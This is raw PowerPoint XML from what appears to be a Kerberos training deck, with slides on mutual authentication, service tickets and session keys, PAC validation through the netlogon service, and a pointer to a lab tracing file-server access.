          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1308050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the client requested mutual authentication the server encrypts the time  stamp in the AP request with the session key and sends it back to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the time stamps match, the client knows that the service is genuine</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Right Arrow 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3285009" y="3326060"/>
            <a:ext cx="2502616"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6. KRB_AP_REP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="154" name="Group 153"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6041728" y="1737151"/>
            <a:ext cx="2814434" cy="1907181"/>
            <a:chOff x="6041728" y="1737151"/>
            <a:chExt cx="2814434" cy="1907181"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="153" name="Picture 1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5849" y="1889297"/>
              <a:ext cx="2690313" cy="1755035"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="104" name="Server"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6041728" y="1737151"/>
              <a:ext cx="2746045" cy="1201485"/>
              <a:chOff x="3025668" y="3771580"/>
              <a:chExt cx="2746045" cy="1201485"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="106" name="Picture 10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5668" y="3771580"/>
                <a:ext cx="499308" cy="685686"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="107" name="TextBox 106"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3208778" y="4022720"/>
                <a:ext cx="2562935" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Server</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="108" name="TextBox 107"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3208778" y="4254546"/>
                <a:ext cx="2562935" cy="184666"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Service Credentials Cache</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="109" name="Picture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2319" y="4593843"/>
                <a:ext cx="379222" cy="379222"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="110" name="TextBox 109"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3932492" y="4653136"/>
                <a:ext cx="1575612" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Service Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="157" name="Group 156"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3287044" y="3553518"/>
            <a:ext cx="2500581" cy="811586"/>
            <a:chOff x="3287044" y="3553518"/>
            <a:chExt cx="2500581" cy="811586"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="146" name="Group 145"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3287044" y="3553518"/>
              <a:ext cx="2500581" cy="811586"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="811586"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="148" name="Rectangle 147"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="811586"/>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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="149" name="TextBox 148"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3604467" y="4084429"/>
                <a:ext cx="1944216" cy="430887"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="3000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Mutual Authentication Information</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="156" name="Picture 1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5823" y="3653658"/>
              <a:ext cx="350731" cy="573238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="260877" y="1698423"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="260877" y="1698423"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="139" name="Group 138"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="260877" y="1698423"/>
              <a:ext cx="2745305" cy="3312979"/>
              <a:chOff x="260877" y="1698423"/>
              <a:chExt cx="2745305" cy="3312979"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="79" name="Workstation Small"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="260877" y="1700808"/>
                <a:ext cx="2745305" cy="2451771"/>
                <a:chOff x="195776" y="2708920"/>
                <a:chExt cx="2745305" cy="2451771"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="80" name="Picture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5155" y="2855866"/>
                  <a:ext cx="2695926" cy="2304825"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="TextBox 80"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="312812" y="2939970"/>
                  <a:ext cx="2567940" cy="215444"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr"/>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t>Workstation</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="82" name="TextBox 81"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="312813" y="3183336"/>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83" name="Picture 8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866" y="3457211"/>
                  <a:ext cx="327713" cy="327713"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="84" name="TextBox 83"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="909969" y="3482148"/>
                  <a:ext cx="1789823"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Ticket</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr>
                    <a:spcAft>
                      <a:spcPts val="1500"/>
                    </a:spcAft>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t>Ticket-</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                    <a:t>Granting</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t> Service Session Key</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="85" name="Picture 8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5776" y="2708920"/>
                  <a:ext cx="566691" cy="526075"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="86" name="Picture 8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6939" y="3898005"/>
                  <a:ext cx="472016" cy="312696"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="87" name="Picture 8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8493" y="4323782"/>
                  <a:ext cx="348452" cy="348452"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="98" name="Workstation Large"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="260877" y="1698423"/>
                <a:ext cx="2745305" cy="3312979"/>
                <a:chOff x="5269256" y="151840"/>
                <a:chExt cx="2745305" cy="3312979"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="99" name="Picture 9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313877" y="302498"/>
                  <a:ext cx="2700684" cy="3162321"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="100" name="Group 99"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="5269256" y="151840"/>
                  <a:ext cx="2685437" cy="665914"/>
                  <a:chOff x="2925296" y="1597991"/>
                  <a:chExt cx="2685437" cy="665914"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="101" name="TextBox 100"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3042792" y="1832275"/>
                    <a:ext cx="2567940" cy="215444"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr"/>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Workstation</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="102" name="TextBox 101"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3042793" y="2079239"/>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103" name="Picture 10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25296" y="1597991"/>
                    <a:ext cx="566691" cy="526075"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </p:spPr>
              </p:pic>
            </p:grpSp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="111" name="Picture 1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4036" y="2449595"/>
                <a:ext cx="327713" cy="327713"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="112" name="TextBox 111"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975139" y="2474532"/>
                <a:ext cx="1789823" cy="2062103"/>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Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Service Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="113" name="Picture 1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2109" y="2890389"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="114" name="Picture 1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3663" y="3316166"/>
                <a:ext cx="348452" cy="348452"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="116" name="Picture 1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4792" y="3838621"/>
                <a:ext cx="475522" cy="315018"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Picture 4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5406" y="4251096"/>
              <a:ext cx="358610" cy="358610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63761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33333E-6 -1.11111E-6 L -3.33333E-6 0.18125 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="154"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="9051"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="7" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 4.16667E-6 -3.7037E-7 L -0.00487 0.1831 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-243" y="9144"/>
                                    </p:animMotion>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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="140"/>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157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="17"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320165"/>
            <a:ext cx="7924800" cy="2708434"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PAC Validation is done if </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service account is not part of the OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service account does not have the privilege “Act as part of the operating system” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SeTcbPrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The validation is done by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service using  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NetrLogonSamLogonEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Opnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> 39)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Understanding Microsoft Kerberos PAC Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be turned off with the registry value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ValidateKdcPacSignature</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PAC Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="648742" y="4149080"/>
            <a:ext cx="10077450" cy="3009900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130582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Lab 3: Trace accessing a file server</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See the document “Kerberos Lab Instructions”</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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459647"/>
            <a:ext cx="2149267" cy="2149267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172176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dirty="0"/>
              <a:t>Why Kerberos?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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19112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a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3085460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How the Kerberos Version 5 Authentication Protocol Works: Logon and Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
